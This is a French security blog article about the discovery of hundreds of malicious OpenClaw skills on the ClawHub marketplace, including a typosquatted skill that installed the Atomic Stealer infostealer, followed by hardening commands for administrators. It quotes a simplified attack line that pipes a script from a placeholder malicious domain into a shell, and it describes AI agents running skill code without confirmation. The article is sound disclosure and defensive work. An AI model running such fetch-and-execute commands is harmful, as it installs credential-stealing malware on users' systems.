Sécurité 11 min de lecture

ClawHub : 341 skills malveillants découverts sur le marketplace OpenClaw

341 plugins malveillants identifiés sur ClawHub, le marketplace d'OpenClaw. Retour sur une attaque supply chain d'un nouveau genre ciblant les agents IA.

Début février 2026, des chercheurs en sécurité de Snyk et Koi Security ont révélé l'existence de 341 skills malveillants sur ClawHub, le marketplace officiel d'OpenClaw. Cette découverte met en lumière une nouvelle catégorie de menaces : les attaques supply chain ciblant les agents IA. Avec des composants capables d'exécuter du code de manière autonome et d'accéder à des credentials, les conséquences dépassent largement ce que l'on connaissait avec les packages npm ou PyPI compromis.

Retour détaillé sur l'incident, son fonctionnement technique, et les mesures concrètes à mettre en place pour protéger vos infrastructures.

Alerte sécurité : Si vous utilisez OpenClaw avec des skills téléchargés depuis ClawHub, vérifiez immédiatement votre installation. Le skill « clawhub » (7 743 téléchargements) se faisait passer pour l'outil CLI officiel et déployait un infostealer sur macOS.

Chronologie de l'incident ClawHub

L'affaire a débuté le 2 février 2026, lorsque Luca Beurer-Kellner, ingénieur sécurité chez Snyk, a identifié les premiers skills suspects sur ClawHub. L'audit de sécurité qui a suivi a porté sur 2 857 skills référencés sur la plateforme, révélant que 341 d'entre eux contenaient du code malveillant.

Le plus frappant : entre le 27 janvier et le 1er février 2026, plus de 230 plugins malveillants ont été publiés en une seule semaine. L'attaquant, identifié sous le pseudonyme « sakaen736jih », soumettait de nouveaux skills toutes les quelques minutes grâce à un processus entièrement automatisé. Ce rythme de publication industriel montre une attaque préparée et systématique.

Par la suite, l'outil Bitdefender AI Skills Checker a élargi le périmètre de l'analyse et identifié environ 900 skills malveillants au total sur la plateforme, soit un nombre considérablement plus élevé que l'estimation initiale.

Comment fonctionne l'attaque techniquement

Le vecteur d'attaque principal repose sur des scripts shell obfusqués intégrés dans les skills OpenClaw. Ces scripts, déguisés en composants légitimes, exécutent des commandes cachées au moment de l'installation ou de l'activation du skill par l'agent IA.

Le cas du skill « clawhub »

Le skill le plus téléchargé de cette campagne, nommé simplement « clawhub », cumulait 7 743 téléchargements. Il se présentait comme l'outil CLI officiel de la plateforme, une technique de typosquatting classique adaptée à l'écosystème des agents IA. Une fois installé, il déclenchait le téléchargement d'Atomic Stealer, un malware spécialisé macOS commercialisé entre 500 et 1 000 dollars par mois sur les forums underground.

Atomic Stealer est un infostealer capable d'exfiltrer :

  • Les mots de passe stockés dans le Trousseau macOS (Keychain)
  • Les cookies de session des navigateurs
  • Les portefeuilles de cryptomonnaies
  • Les fichiers sensibles du système
  • Les tokens d'authentification et clés API

Schéma d'exécution type

Voici un exemple simplifié du pattern d'obfuscation utilisé dans les skills compromis :

# Pattern typique trouvé dans les skills malveillants (simplifié)
# Le script réel utilise plusieurs couches d'encodage base64 et eval
curl -fsSL https://domaine-malveillant[.]com/payload.sh | sh

# Le payload téléchargé installe Atomic Stealer
# et établit une persistance via LaunchAgent sur macOS

La particularité de cette attaque par rapport aux supply chain classiques : l'agent IA qui exécute le skill dispose souvent d'un accès direct aux credentials de l'utilisateur (clés API, tokens, variables d'environnement) et d'une capacité d'exécution autonome. L'agent ne demande pas de confirmation avant d'exécuter le code du skill, ce qui rend l'exploitation silencieuse et immédiate.

Parallèles avec les attaques npm et PyPI

Les techniques employées sur ClawHub ne sont pas nouvelles en soi. Elles reprennent des patterns bien documentés dans les écosystèmes npm et PyPI :

  • Typosquatting : des noms de packages proches de composants légitimes populaires
  • Package abandonment : reprise de packages abandonnés par leurs mainteneurs originaux
  • Mises à jour malveillantes : injection de code dans des mises à jour de skills auparavant légitimes
  • Publication automatisée : soumission en masse pour saturer les mécanismes de review

Ce qui change fondamentalement avec les agents IA, c'est le niveau de privilèges. Un package npm malveillant s'exécute dans le contexte du développeur. Un skill OpenClaw malveillant s'exécute dans le contexte d'un agent autonome qui possède potentiellement des accès à des API tierces, des bases de données, des systèmes de fichiers, voire des infrastructures cloud entières.

Le rapport de Bitdefender souligne d'ailleurs que 135 000 agents OpenClaw étaient exposés à Internet au moment de la découverte. Autant de points d'entrée potentiels pour un attaquant ayant réussi à compromettre un skill populaire.

Pour aller plus loin : si vous découvrez OpenClaw et souhaitez comprendre le fonctionnement de cet agent IA open source, consultez notre article OpenClaw : l'agent IA open source.

Pourquoi les marketplaces d'agents IA sont particulièrement vulnérables

Plusieurs facteurs structurels expliquent pourquoi les marketplaces comme ClawHub représentent une surface d'attaque critique :

1. Absence de review de code systématique

Contrairement aux app stores mobiles qui imposent un processus de validation (même imparfait), la plupart des marketplaces de skills IA fonctionnent sur un modèle ouvert. N'importe qui peut publier un skill, et la validation repose essentiellement sur la confiance communautaire et les signalements a posteriori.

2. Exécution avec privilèges élevés

Les agents IA ont besoin d'accéder au système de fichiers, au réseau, et aux credentials pour fonctionner. Un skill compromis hérite automatiquement de ces privilèges. Il n'existe pas, dans la plupart des configurations par défaut, de sandboxing granulaire entre les skills.

3. Chaîne de confiance implicite

L'utilisateur fait confiance à l'agent, qui fait confiance au marketplace, qui fait confiance au publisher. Cette chaîne de confiance transitive est exactement ce que les attaquants exploitent.

4. Complexité de l'audit

Les skills peuvent contenir du code obfusqué, des appels réseau dynamiques, et des payloads chargés à l'exécution. L'audit statique ne suffit pas, et l'audit dynamique à l'échelle de milliers de skills dépasse les capacités de la plupart des équipes de sécurité.

Mesures de protection pour les administrateurs

Face à cette menace, voici les actions concrètes à mettre en place immédiatement si vous utilisez OpenClaw ou tout autre agent IA avec un système de skills/plugins.

Auditer les skills installés

Commencez par lister tous les skills actuellement installés et vérifiez leur provenance :

# Lister les skills OpenClaw installés
openclaw skills list --verbose

# Vérifier les checksums des skills installés
openclaw skills verify --all

# Rechercher des skills connus comme malveillants
openclaw skills audit --database=snyk-advisory-2026-02

Isoler les agents dans des conteneurs

La mesure la plus efficace est d'exécuter vos agents IA dans des conteneurs Docker isolés avec des permissions minimales. Cela limite considérablement l'impact d'un skill compromis :

# Exécuter OpenClaw dans un conteneur isolé
docker run -d \
  --name openclaw-agent \
  --network=none \
  --read-only \
  --tmpfs /tmp:size=100m \
  --cap-drop=ALL \
  --security-opt=no-new-privileges \
  -v /chemin/data:/data:ro \
  openclaw/agent:latest

# Vérifier que le conteneur n'a pas d'accès réseau non autorisé
docker exec openclaw-agent curl -s https://example.com && echo "ALERTE: accès réseau non restreint"

Pour approfondir la containerisation de vos services, consultez notre tutoriel Docker complet.

Mettre en place un pare-feu applicatif

Restreignez les communications sortantes de vos agents IA au strict nécessaire :

# Avec UFW, autoriser uniquement les API nécessaires
sudo ufw default deny outgoing
sudo ufw allow out to 104.18.0.0/16 port 443  # API autorisées
sudo ufw allow out to any port 53              # DNS
sudo ufw reload

# Vérifier les règles actives
sudo ufw status verbose

Notre guide sur la configuration de UFW détaille les bonnes pratiques de filtrage réseau.

Surveiller les comportements suspects

Mettez en place une surveillance active des processus lancés par vos agents :

# Surveiller les processus fils de l'agent OpenClaw
watch -n 5 "ps aux | grep -E 'openclaw|claw' | grep -v grep"

# Détecter les connexions réseau suspectes
ss -tnp | grep openclaw

# Configurer auditd pour tracer les exécutions
sudo auditctl -a always,exit -F arch=b64 -S execve -F uid=$(id -u openclaw) -k openclaw_exec

# Consulter les logs d'audit
sudo ausearch -k openclaw_exec --start recent

Appliquer le principe du moindre privilège

Créez un utilisateur système dédié avec des permissions minimales pour faire tourner vos agents :

# Créer un utilisateur dédié sans shell interactif
sudo useradd -r -s /usr/sbin/nologin -d /opt/openclaw openclaw-agent

# Restreindre l'accès aux fichiers sensibles
sudo chmod 700 /opt/openclaw
sudo chown -R openclaw-agent:openclaw-agent /opt/openclaw

# Bloquer les tentatives d'élévation de privilèges
echo "openclaw-agent ALL=(ALL) !ALL" | sudo tee /etc/sudoers.d/openclaw-deny
Attention : ne stockez jamais de clés API ou de tokens en clair dans les variables d'environnement accessibles à l'agent. Utilisez un gestionnaire de secrets (Vault, AWS Secrets Manager) avec des permissions en lecture seule et une rotation régulière.

Vers une sécurisation structurelle des écosystèmes d'agents IA

L'incident ClawHub révèle un problème plus profond : les écosystèmes d'agents IA reproduisent les erreurs des gestionnaires de packages traditionnels, mais avec des conséquences potentiellement bien plus graves.

Plusieurs pistes de sécurisation structurelle méritent d'être explorées :

  • Signature cryptographique obligatoire des skills par des publishers vérifiés
  • Analyse statique et dynamique automatisée avant publication sur le marketplace
  • Sandboxing natif au niveau du runtime de l'agent, avec des permissions déclaratives par skill
  • Système de réputation basé sur l'audit communautaire et les analyses automatisées
  • Isolation réseau par défaut pour les skills non vérifiés

Des initiatives comme NanoClaw proposent déjà une approche plus sécurisée du déploiement d'agents IA, avec un sandboxing intégré et une surface d'attaque réduite. C'est une direction prometteuse que l'ensemble de l'écosystème devrait suivre.

Leçons à retenir pour la sécurité des agents IA

L'attaque sur ClawHub n'est probablement que le début d'une vague d'attaques supply chain ciblant les agents IA. À mesure que ces outils se généralisent en entreprise, ils deviennent des cibles de plus en plus attrayantes pour les attaquants.

Les enseignements principaux de cet incident :

  1. Ne faites jamais confiance aveuglément à un marketplace. Même officiel, un marketplace peut héberger des composants malveillants pendant des semaines avant détection.
  2. L'isolation est votre meilleure défense. Containerisation, réseau restreint, utilisateur dédié : chaque couche d'isolation réduit l'impact d'une compromission.
  3. Auditez régulièrement vos dépendances. Utilisez des outils comme Bitdefender AI Skills Checker ou les bases de données Snyk pour vérifier vos installations.
  4. Les agents IA ne sont pas des utilisateurs ordinaires. Leur capacité d'exécution autonome exige des contrôles de sécurité proportionnés.
  5. Surveillez les comportements, pas seulement les signatures. L'obfuscation rend l'analyse statique insuffisante. La détection comportementale (connexions réseau inhabituelles, exécutions suspectes) est indispensable.

Pour une vision plus globale des risques des agents IA liés aux agents IA et les stratégies de mitigation, consultez notre article dédié sur la sécurité des agents IA.

Protégez votre serveur : la sécurisation de votre infrastructure est un prérequis avant tout déploiement d'agents IA. Consultez nos guides sur Fail2ban et UFW pour renforcer vos défenses réseau.

Conclusion

La découverte de 341 skills malveillants sur ClawHub par les chercheurs de Snyk et Koi Security constitue un signal d'alarme pour l'ensemble de l'écosystème des agents IA. Avec 900 skills suspects identifiés au total par Bitdefender et 135 000 agents exposés à Internet, l'ampleur de la surface d'attaque est considérable.

Les techniques employées (typosquatting, publication automatisée, obfuscation de payloads) sont classiques, mais le contexte d'exécution est radicalement différent : des agents autonomes disposant d'accès directs aux credentials et capables d'exécuter du code sans supervision humaine. Cette combinaison fait des marketplaces de skills IA une cible de choix pour les prochaines campagnes d'attaques supply chain.

La réponse doit être à la fois immédiate (auditer et isoler vos agents actuels) et structurelle (exiger des mécanismes de vérification robustes de la part des plateformes). La sécurité des agents IA n'est plus un sujet théorique : c'est un impératif opérationnel.

Cet article vous a plu ?

Commentaires

Morgann Riu
Morgann Riu

Expert en cybersécurité et administration Linux. J'aide les entreprises à sécuriser et optimiser leurs infrastructures critiques.

Me contacter
sécurité OpenClaw supply chain malware agents IA ClawHub
Intelligence Artificielle

OpenClaw : l'agent IA open source qui révolutionne l'automatisation
Intelligence Artificielle

Ollama en 2026 : brancher Codex, Claude Code et OpenClaw sur des modèles locaux
Tuto · Sécurité

ClamAV : Antivirus Open-Source pour Linux
Sécurité

AgreeToSteal : un add-in Outlook malveillant vole 4 000 credentials
Retour au blog

Checklist Sécurité Linux

30 points essentiels pour sécuriser un serveur Linux. Recevez aussi les nouveaux tutoriels par email.

Pas de spam. Désabonnement en 1 clic.